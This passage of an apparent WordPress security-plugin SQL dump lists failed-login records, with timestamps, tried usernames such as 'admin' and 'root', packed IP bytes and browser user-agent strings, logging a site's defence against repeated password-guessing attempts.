rv:62.0) Gecko/20100101 Firefox/62.0'),(4757,7351,1629071960.755808,1,'loginFailInvalidUsername','cecelia',0,'\0\0\0\0\0\0\0\0\0\0��tʡ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4758,7352,1629072171.284102,1,'loginFailInvalidUsername','ennio',0,'\0\0\0\0\0\0\0\0\0\0��� �C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4759,7353,1629072369.844369,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��h�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4760,7354,1629072718.679307,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4761,7355,1629072899.014222,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���c��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4762,7356,1629073498.776829,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4763,7357,1629073685.601509,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4764,7358,1629074193.176726,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���zX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4765,7359,1629074426.123656,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����_�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4766,7360,1629074738.161186,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4767,7363,1629075169.523688,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���cL\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4768,7364,1629075470.361700,1,'loginFailInvalidUsername','dvabientap',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4769,7365,1629075774.649818,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��$Y�i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4770,7366,1629076015.492759,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4771,7367,1629076266.829562,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4772,7368,1629076507.306783,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����_�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4773,7369,1629076758.420589,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��%H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4774,7370,1629077191.988253,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ډ2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4775,7371,1629077412.825214,1,'loginFailInvalidUsername','chynna',0,'\0\0\0\0\0\0\0\0\0\0���AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4776,7372,1629077761.042141,1,'loginFailInvalidUsername','thomas',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4777,7373,1629077894.406581,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(4778,7374,1629077903.245847,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0���AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4779,7375,1629078225.884528,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4780,7376,1629078532.584530,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4781,7377,1629078772.656715,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(4782,7378,1629078836.254279,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4783,7379,1629079002.636810,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4784,7380,1629079262.822367,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#ގs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4785,7382,1629079982.331325,1,'loginFailInvalidUsername','sophie',0,'\0\0\0\0\0\0\0\0\0\0��� �C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4786,7383,1629080273.607708,1,'loginFailInvalidUsername','vendor',0,'\0\0\0\0\0\0\0\0\0\0��*p&U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4787,7384,1629080557.332936,1,'loginFailInvalidUsername','seller2',0,'\0\0\0\0\0\0\0\0\0\0��P���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4788,7385,1629080998.518984,1,'loginFailInvalidUsername','shan',0,'\0\0\0\0\0\0\0\0\0\0��4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4789,7386,1629081041.157276,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y��9','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(4790,7387,1629081218.023494,1,'loginFailInvalidUsername','jamie',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4791,7388,1629081501.912699,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-�f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4792,7389,1629081752.800283,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4793,7390,1629081976.029863,1,'loginFailInvalidUsername','two',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4794,7392,1629082427.964779,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0���\"%\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4795,7393,1629082786.217372,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4796,7394,1629082912.007013,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4797,7395,1629083366.744775,1,'loginFailInvalidUsername','author_media',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4798,7396,1629083505.667154,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4799,7397,1629083771.928878,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4800,7398,1629084011.071329,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4801,7400,1629084211.275691,1,'loginFailInvalidUsername','ezf_listing',0,'\0\0\0\0\0\0\0\0\0\0��3[9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4802,7401,1629084489.861499,1,'loginFailInvalidUsername','thua',0,'\0\0\0\0\0\0\0\0\0\0�����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4803,7403,1629085268.103113,1,'loginFailInvalidUsername','123456',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4804,7404,1629085506.704922,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4805,7405,1629085743.521413,1,'loginFailInvalidUsername','mark',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4806,7406,1629085953.924036,1,'loginFailInvalidUsername','justin',0,'\0\0\0\0\0\0\0\0\0\0���_l�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4807,7407,1629086155.638239,1,'loginFailInvalidUsername','kamrul562',0,'\0\0\0\0\0\0\0\0\0\0���AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4808,7408,1629086517.596795,1,'loginFailInvalidUsername','jake',0,'\0\0\0\0\0\0\0\0\0\0��RЧE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4809,7409,1629086758.220175,1,'loginFailInvalidUsername','wpupdateuser',0,'\0\0\0\0\0\0\0\0\0\0��`L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4810,7410,1629087026.409822,1,'loginFailInvalidUsername','wodo_listing',0,'\0\0\0\0\0\0\0\0\0\0����t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4811,7412,1629087454.032664,1,'loginFailInvalidUsername','jane',0,'\0\0\0\0\0\0\0\0\0\0���ǐ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4812,7413,1629087789.578984,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����g','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4813,7414,1629088035.244232,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��*p&U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4814,7415,1629088219.052180,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���襱','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4815,7416,1629088791.016576,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4816,7417,1629089049.400389,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4817,7421,1629089587.445925,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0��}�L1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4818,7422,1629089834.438613,1,'loginFailInvalidUsername','gary',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4819,7423,1629090069.356790,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���PK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4820,7424,1629090501.243932,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���MW','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4821,7425,1629090737.941249,1,'loginFailInvalidUsername','saqibali871',0,'\0\0\0\0\0\0\0\0\0\0���%�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4822,7426,1629091082.724229,1,'loginFailInvalidUsername','osco',0,'\0\0\0\0\0\0\0\0\0\0���;S�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4823,7427,1629091249.227949,1,'loginFailInvalidUsername','sadewa',0,'\0\0\0\0\0\0\0\0\0\0���n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4824,7428,1629091618.775545,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4825,7429,1629091782.244701,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��p�wB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4826,7430,1629092095.957022,1,'loginFailInvalidUsername','wynonna',0,'\0\0\0\0\0\0\0\0\0\0���Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4827,7431,1629092364.830012,1,'loginFailInvalidUsername','testuser1',0,'\0\0\0\0\0\0\0\0\0\0�����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4828,7432,1629092503.735233,1,'loginFailInvalidUsername','usuario',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4829,7433,1629092841.139016,1,'loginFailInvalidUsername','HelloRDP123',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4830,7434,1629093126.699999,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4831,7435,1629093310.979072,1,'loginFailInvalidUsername','Hannah_Miller',0,'\0\0\0\0\0\0\0\0\0\0��ԁ\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4832,7436,1629093388.335224,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(4833,7437,1629093530.219156,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(4834,7438,1629096502.606801,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4835,7439,1629099515.619034,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(4836,7441,1629111648.875104,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(4837,7442,1629114699.861364,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4838,7443,1629182492.917313,1,'loginFailInvalidUsername','wordcamp',0,'\0\0\0\0\0\0\0\0\0\0���>�','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(4839,7444,1629184513.553904,1,'loginFailInvalidUsername','adminlin',0,'\0\0\0\0\0\0\0\0\0\0���>�','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(4840,7447,1629211710.523433,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4841,7448,1629211714.781940,1,'loginFailInvalidUsername','twitter',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4842,7449,1629211717.231988,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4843,7450,1629211719.437097,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4844,7451,1629211729.264747,1,'loginFailInvalidUsername','twitter@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4845,7452,1629211733.351819,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4846,7453,1629211736.153647,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��;�}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4847,7455,1629221444.888633,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"Q�W','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4848,7456,1629221626.521148,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4849,7457,1629221857.835455,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4850,7458,1629222037.462633,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4851,7459,1629222242.075328,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���h,I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4852,7460,1629222444.523766,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@ʺE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4853,7461,1629222646.384136,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4854,7462,1629222868.606711,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#Ɖ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4855,7463,1629223048.584424,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����o�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4856,7464,1629223259.194690,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����q[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4857,7465,1629223458.783303,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���5#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4858,7466,1629223660.212761,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��؉�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4859,7466,1629223660.249646,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��؉�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4860,7467,1629223862.763755,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��S�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4861,7468,1629224094.079495,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4862,7469,1629224272.739488,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����zR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4863,7470,1629224476.254898,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4864,7471,1629224681.485056,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���z2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4865,7471,1629224681.526625,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���z2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4866,7472,1629224884.214092,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��B�\nj','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4867,7473,1629225094.430487,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4868,7474,1629225290.519648,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4869,7475,1629225514.021643,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4870,7476,1629225696.017454,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4871,7477,1629225899.817812,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4872,7478,1629226105.894005,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4873,7479,1629226331.985930,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4874,7480,1629226517.103248,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4875,7481,1629226741.014167,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4876,7482,1629226946.636363,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"P�}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4877,7483,1629227219.529495,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4878,7484,1629227505.059754,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g|]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4879,7485,1629227771.067224,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4880,7486,1629228070.999107,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4881,7487,1629228371.221043,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 